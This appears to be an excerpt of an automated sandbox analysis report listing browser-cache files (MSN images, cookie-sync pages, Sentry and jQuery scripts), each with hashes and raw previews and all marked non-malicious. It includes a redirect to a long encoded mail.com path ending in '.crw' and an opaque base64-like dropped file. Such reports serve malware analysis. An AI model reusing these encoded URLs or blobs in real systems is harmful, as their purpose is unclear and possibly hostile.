Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..QKN.A....(..1a.....p...o..T........./.......$..n\...V.C .b2.......qe'.T.1.1h8./.....$:Y6...w}_>...P.o$.n....X,<...R..y....$p.P..c.\.7..f...H.vm...I........b..K..3.....R..u...Z'.?..$.B...l.r....H.1....MN).c.K1H..........t...9........d.$.....:..8..8@t._...1.".@C....i&Z.'...A1...!....R....}.w.E4.\|_..N.....b...(.^.vH........j......s...h. ..9.p!.....gT.=B.\|..,=v.......G..c.5.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	downloaded
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBUZVvV[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	415
Entropy (8bit):	7.093730449593416
Encrypted:	false
SSDEEP:	12:6v/7C7Stjm5n9HPBQrd/9a5cFWziVYbALUO1:BAm59irna55uYMb1
MD5:	16B34C1836A5FC244145527EC79361D4
SHA1:	18CB908457B380545D89D8A4D3F91CDABF3ADC78
SHA-256:	DB797DF4F1E320C21BD6019E89E6CCC5569C5CED57E1D3BDD736F3B4A9371BC0
SHA-512:	3FFFFB5F6876B8C246F2728A3AEA8EDF2997032F8CD9CE375497D8063939F810BB819E4CDC56B1ECA5E8A70B27E7355C2A9B7F23BDF8919307F01536008D4D75
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUZVvV.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....pHYs..........+.....QIDATx.cy.(.....B.^.V......6..OD9... .b..1.o.c.y....v.+..sK..>N.............W.... .........aL....Z..<I.`..ek.~.<.W.......`..O..~C. .....%. .3..1..~....h(...[...}...u.J......&=..?.....aa.....r...;..4q..3....[.....q...];.^^se`...K..6..UK...X..)..k;...X.U..2....0......f.t.......p.....\|]..n;H...P ..va....'..N..............!.....).&O...Fqo.%.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	316
Entropy (8bit):	6.917866057386609
Encrypted:	false
SSDEEP:	6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
MD5:	636BACD8AA35BA805314755511D4CE04
SHA1:	9BB424A02481910CE3EE30ABDA54304D90D51CA9
SHA-256:	157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
SHA-512:	7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..\|......\|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.\|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.\|.Q...Q..i~.\|...._...'..Q...".....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	879
Entropy (8bit):	7.684764008510229
Encrypted:	false
SSDEEP:	24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
MD5:	4AAAEC9CA6F651BE6C54B005E92EA928
SHA1:	7296EC91AC01A8C127CD5B032A26BBC0B64E1451
SHA-256:	90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
SHA-512:	09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u......,I"...)...z............>.OVObQ......d?\|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x\|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......\|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..\|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...\|X..."!..'/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...Kq..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	548
Entropy (8bit):	7.4464066014795485
Encrypted:	false
SSDEEP:	12:6v/7oFyvunVNrddHWjrT0rTKQIxOiYeJbW8Ll1:RFyiDrqTSQxLYeBW8Lz
MD5:	991DB6ED4A1C71F86F244EEA7BBAD67F
SHA1:	D30FDEDFA2E1A2DB0A70E4213931063F9F16E73D
SHA-256:	372F26F466B6BF69B9D981CB4942FE33301AAA25BE416DDE9E69CF5426CD2556
SHA-512:	252D9F26FA440D79BA358B010E77E4B5B61C45F5564A6655C87436002B4B7CB63497E6B5EEB55F8787626DA8A32C5FCEF977468F7B48B59D19DE34EA768B2941
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx......Q..?WE..P...)h...."".....?a.....55.4.....EECDZ.A.%M0.A.%....<../..z.}.s..>..<.y_.....6../S.z.....(..s9:....b.`2.X..l6..X...F..N..x<.r...j...........<>..D"A......-.~...M .`2.`.Z...r1.N..b.v;..Z.z..R,.I&...A:.......~?....NG.Vc.X..4.M......Ta.....l&.....,...F...v....j."....zI.R.&....r.zi..a.rY..f3.\N6Qt?......U..5..R.VI..D"...,.^O..p....._>q.....!.\|....K.w....J_.x.=...1y~..C{.<F...>..:\|...g.\|....8..?.....;.yM.f@..<.....u..kv.L.5n.....m.M...O....V.G.Q......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\F[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	239040
Entropy (8bit):	5.999802925275648
Encrypted:	false
SSDEEP:	6144:sWWO/3AGid9SSQt9syilc7YJmsALVMB19tYc7czhT3kWm/tNkB:sPO/zid9SSesyZEmNW/LYvVzQtNkB
MD5:	8B34F1893A45360773E64A27481B92AE
SHA1:	787254431C8AC83D3EED0E8382864696F706CDC2
SHA-256:	127B3F3A4CEF3E1CB68728E8488257733750E5278DF49D04718545212C6AACBF
SHA-512:	637874B2A80F8A7721F69E3EBA52F4E7410D42EC6C55ECCF7F05A34415CE5A7DBA82672D3F4EA31FD549F945A059F177E679EF5F8E4622E4C35BCA292C3FBBAD
Malicious:	false
Preview:	T7PCF+F1JUKATbbsknU2vXSLW0pETJVizQ+Dh5EMfs7xEfyF3KHQiSqHzUhC+eOe4xOmktxF8hkINPAyGwtLuxjzQUX0dOlxRhl2IyMqjlRkSyVOerucVlI3u65bpj0OmRvCWG8Jq+L3tJtOv1tBtGZXZBluy2p4TVTWgpPzOQwvm0rhVsOHbxDKLzkY6MP2R2GpP9xqBRF4gz0HtSMXjwDNwqFcI24Fb+1+dse5iLDfQyB5q73am9aRg6tuCqeSGPNdu0DorC+e657Bk2iWfKNrEJG43vJN+hE0oL7iv41LP673aKA5l3bIHoFwL0Ox7jiH7Z6RNa7B+8Bfm4QBfN1h0U5uGsehqxzVH3FeDwOkBzuC9jbJzwLK8a+jIgQSJRmMTCr23yggFMBuk942LWREFJyXW2ReGa8acuyzT6UWZ5hOXnyXTCFa9HvLqrV6AtVlxb4F74IQcyPo6MJ/XltWRnDfUaMboNmQXApLV9IJfJt6PU7zfxY7HFMLhYIbzaaCucqXW3awk0ND1T0n6N6Y5WDDoiNzKdQJKinH/KsK2q/0+4iSB1S3cP5Jw1THwOE7tkwTqq/kN3ec7dm8uG0pLd+ciMmBhDA1LxilSrj6mdoEpoUzhQ0cIkiYznLIOAuKLJvCx9K2l/pX5vhRGEI4WiKms34NvxDw1BrppeHfq6m5bZJ+jGnWQ3VTC9hp+zb0kPQAJ8aomsK5EMKAj8ueEOpfynTSkLhaRCkZ1He/4YzN8AX1kPEsL+qGAiAlQPETbLer6Ha+vfwiZP4AXU3wIBEbxHrgnN/Gg8f63Gm38BfRhPwY9jyGR4BVP5x9JfC25oat/nW5N9hsZK4H3odqROuDY1SLvkBdWreTBxuU7rg4+ElAElRzRpH7cgRPr2JzG5yQU6U48Q1okD1LB3zkfFgtMF5ohCVpr8MT7Qu4QP8snPprFkRnteN1q4kSkhMQxN/P4DqRE/nTEqAHLHAl2+ELmI3QRBRGNjSe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\bundle.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	51570
Entropy (8bit):	5.229859453550898
Encrypted:	false
SSDEEP:	768:RCQwVYkQeqn2UfXfZgHHg6Ud2bGuRyUuCdk6b2CF3+RUjjr90RXgb:RW6FZUbUELNsRwb
MD5:	B1DCC6195D84CF50C3E882D3D515F848
SHA1:	06562C193663A31A3CABEAA18CFFEB882084FCB6
SHA-256:	8C04755395B8F232C57D062A7669C3C414658299D29C6B6F83F1F30185D94ECB
SHA-512:	344C3014C59BA72512DEF4E8963088A61D20334555B4C85E64EFBBC19FCA19EA305237D3ED048863F77F80F0427DDD9C81D5359DC8EEA674A75D960A04678D29
Malicious:	false
IE Cache URL:	https://s.uicdn.com/shared/sentry/5.5.0/bundle.min.js
Preview:	/! @sentry/browser 5.5.0 (994247d6) \| https://github.com/getsentry/sentry-javascript /.var Sentry=function(n){var t=function(n,r){return(t=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}\|\|function(n,t){for(var r in t)t.hasOwnProperty(r)&&(n[r]=t[r])})(n,r)};function r(n,r){function e(){this.constructor=n}t(n,r),n.prototype=null===r?Object.create(r):(e.prototype=r.prototype,new e)}var e,i,o,u=function(){return(u=Object.assign\|\|function(n){for(var t,r=1,e=arguments.length;r<e;r++)for(var i in t=arguments[r])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n}).apply(this,arguments)};function c(n,t){var r="function"==typeof Symbol&&n[Symbol.iterator];if(!r)return n;var e,i,o=r.call(n),u=[];try{for(;(void 0===t\|\|t-- >0)&&!(e=o.next()).done;)u.push(e.value)}catch(n){i={error:n}}finally{try{e&&!e.done&&(r=o.return)&&r.call(o)}finally{if(i)throw i.error}}return u}function s(){for(var n=[],t=0;t<arguments.length;t++)n=n.concat(c(arguments[t]));

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21552
Entropy (8bit):	5.305154231032811
Encrypted:	false
SSDEEP:	384:aiAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZObQWwY4RXrqt:x86qhbS2RpF3OsbQWwY4RXrqt
MD5:	C778C41A900F4EA29A5F48DE750EE763
SHA1:	57B9CB5CF68A0D2B612C2500EEA20687E8FB8204
SHA-256:	4E4F9EAA15F2B920F6489A7D53A85858B77C420CC9F5C135D4446B29B9E03886
SHA-512:	D79839B9C37415E56969554059DFD0E665CFA6438EEADBC592C4D689E4A10A7BA83520694F64C42E25D860E21E3803C08A15674D6567D1A8CE9504E688C4D8B0
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21552
Entropy (8bit):	5.305154231032811
Encrypted:	false
SSDEEP:	384:aiAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZObQWwY4RXrqt:x86qhbS2RpF3OsbQWwY4RXrqt
MD5:	C778C41A900F4EA29A5F48DE750EE763
SHA1:	57B9CB5CF68A0D2B612C2500EEA20687E8FB8204
SHA-256:	4E4F9EAA15F2B920F6489A7D53A85858B77C420CC9F5C135D4446B29B9E03886
SHA-512:	D79839B9C37415E56969554059DFD0E665CFA6438EEADBC592C4D689E4A10A7BA83520694F64C42E25D860E21E3803C08A15674D6567D1A8CE9504E688C4D8B0
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21552
Entropy (8bit):	5.305154231032811
Encrypted:	false
SSDEEP:	384:aiAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZObQWwY4RXrqt:x86qhbS2RpF3OsbQWwY4RXrqt
MD5:	C778C41A900F4EA29A5F48DE750EE763
SHA1:	57B9CB5CF68A0D2B612C2500EEA20687E8FB8204
SHA-256:	4E4F9EAA15F2B920F6489A7D53A85858B77C420CC9F5C135D4446B29B9E03886
SHA-512:	D79839B9C37415E56969554059DFD0E665CFA6438EEADBC592C4D689E4A10A7BA83520694F64C42E25D860E21E3803C08A15674D6567D1A8CE9504E688C4D8B0
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[4].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21552
Entropy (8bit):	5.305154231032811
Encrypted:	false
SSDEEP:	384:aiAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZObQWwY4RXrqt:x86qhbS2RpF3OsbQWwY4RXrqt
MD5:	C778C41A900F4EA29A5F48DE750EE763
SHA1:	57B9CB5CF68A0D2B612C2500EEA20687E8FB8204
SHA-256:	4E4F9EAA15F2B920F6489A7D53A85858B77C420CC9F5C135D4446B29B9E03886
SHA-512:	D79839B9C37415E56969554059DFD0E665CFA6438EEADBC592C4D689E4A10A7BA83520694F64C42E25D860E21E3803C08A15674D6567D1A8CE9504E688C4D8B0
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	422301
Entropy (8bit):	5.442950755022526
Encrypted:	false
SSDEEP:	3072:cJAJUjxx+4Pkf8+EFIYe8Wuv6HjP1hoHGX7bmvb/UJwWvb/5SU0He7hLZ:cJAoO4aHUHU7b2wwR+7j
MD5:	B2F806ED1CCA0B12D360D00DB700AE59
SHA1:	3FE483283F26D5A1F8CEB73837DA4DAF8066C4E9
SHA-256:	FD8FFC87316F27D3A8982F966779CB7FF125EBC6E50D1BFEC6BF776C1774823B
SHA-512:	8AB6111085651E2FCCA2484052AC570F24CF22662959C3BC95844598F3194F0298ECD0B34207BA9B370F6187463190D534FE2FBD5402BA70C5B68CDC498FD976
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >..<head data-info="v:20210629_22136374;a:1eae17b2-9555-4c6e-94f1-f982ae6e93ed;cn:15;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 15, sn: neurope-prod-hp, dt: 2021-06-19T18:56:40.8400325Z, bt: 2021-06-29T00:12:15.5968641Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-06-14 10:00:39Z;xdmap:2021-07-06 12:27:40Z;axd:;f:msnallexpusers,muidflt26cf,muidflt29cf,muidflt57cf,muidflt258cf,muidflt298cf,pneedge3cf,audexedge2cf,bingcollabedge2cf,pnehp3cf,platagyhp3cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msncf,1s-winblis,1s-winblisp1,prg-adspeek,csmoney7cf,1s-feedcachectl,prg-cpcbship,prg-cbencards2,prg-cbfeed,prg-cpp,prg-northstar,prg-wpo-northstr;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\e[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	462
Entropy (8bit):	5.7868543504464585
Encrypted:	false
SSDEEP:	12:J0+ox0RJWWPfiT6XY5/Kg54V+Ub7oEqSj/kET:y+OWPq5CgeV+GeCJ
MD5:	B4AA60FB97E5029A5B52AD2085E64705
SHA1:	C30EBCCC16C47D09A2D913CB7AE0D3BD8FFFAB7B
SHA-256:	8B80A45C4DC35E66BDDD9ED74D115682672D51C471DEF5C54DFD2E3079ECBA2A
SHA-512:	7D8960A7561FDB196B73D2575EB666CB99504BE1EFE4A4CE36B70F3408B14811F1EE15DD10A5E0E7988492061C8CA014C2B57C91C2E079FA7205B9536D37F2BC
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://www.mail.com/jdraw/Znr0BwihB_2/BBSAgqA_2Bvk1i/IfnwU5vA_2F_2BT4u_2BM/ooM_2BIE_2FJu2S0/V6gtACw17bho6cO/phbvyuHxUy1yAc1nHo/SmD5Kl7lu/ESuvWN3id1aXgiHqOeaF/KKWvsMpR0wkH3d3Kuf8/H46PVjCAZw3tMyCBuEX4LH/6ntaf4isR_2Bm/Ch0iSaAl/_2Fqp4Es2DAf9RZz0F005vG/e.crw">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http___cdn.taboola.com_libtrc_static_thumbnails_26b7c43e8735f7408c60e41fb7e91ecd[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	15272
Entropy (8bit):	7.746669724171038
Encrypted:	false
SSDEEP:	384:+hq4/wYNg7d8qq/uRzBpSPnDyOfia52jvHa:EoYyp8qvGaaE7a
MD5:	3D15488C4E13B562DF2958C9C5DFBC8A
SHA1:	6EB1FFA4BFC5AC5D1EF77333787957DC73879D16
SHA-256:	92C55F09D5705690AA849771A368CB4F1B0EAB9ACCFFA8E62FD9A1C28168EB97
SHA-512:	A48C0A9CBA3BB5A1A10991D8C446794BA4F5D87FDB628D3DEAADCAE52191616C782B09C10144CCA47EAE70CF78CD0B2C5A5C4A74376080A666E3155648F88CAB
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F26b7c43e8735f7408c60e41fb7e91ecd.jpg
Preview:	......JFIF.............@ICC_PROFILE......0appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ...,....rTRC...@....aarg...L... vcgt...l...0ndin.......>chad.......,mmod.......(bTRC...@....gTRC...@....aabg...L... aagg...L... desc........Display.................................................................................mluc......."....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........ukUA.......2ar.........NitIT.......broRO.......vnlNL........heIL........esES.......vfiFI........zhTW........viVN........skSK........zhCN........ruRU...$....frFR........ms..........caES.......@thTH.......XesXL.......vdeDE.......denUS.......tptBR........plPL........elGR..."....svSE........trTR........jaJP........ptPT.........L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e.-.L.C.D.L.C.D. .W.a.r.n.a.S.z...n.e.s. .L.C.D.B.a.r.e.v.n..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
